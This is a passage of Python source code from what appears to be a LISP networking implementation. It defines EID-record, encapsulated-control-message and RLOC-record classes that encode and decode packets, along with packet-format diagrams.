# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsualted Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# JSON Data Model Type Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 14 | kid | Rvd2|E|B| Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | JSON length | JSON binary/text encoding ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Optional Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When the E-bit is set to 1, then the kid is key-id and indicates that
# value fields in JSON string are encrypted with the encryption key
# associated with key-id 'kid'.
#
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False,
True))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_json(self, lisp_json):
json_string = lisp_json.json_string
kid = 0
if (lisp_json.json_encrypted):
kid = (lisp_json.json_key_id << 5) | 0x02
#endif
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
addr_len = self.rloc.addr_length() + 2
lcaf_len = socket.htons(len(json_string) + addr_len)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, kid,
lcaf_len, json_len)
packet += json_string
#
# If telemetry, store RLOC address in LCAF.
#
if (lisp_is_json_telemetry(json_string)):
packet += struct.pack("H", socket.htons(self.rloc.afi))
packet += self.rloc.pack_address()
else:
packet += struct.pack("H", 0)
#endif
return(packet)
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
jpkt = self.encode_json(self.json)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce, ms_json_encrypt):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
encrypted_json = rsvd2 & 0x02
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len], encrypted_json,
ms_json_encrypt)
packet = packet[json_len::]
#
# If telemetry, store RLOC address in LCAF.
#
afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
packet = packet[2::]
if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
#endif
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
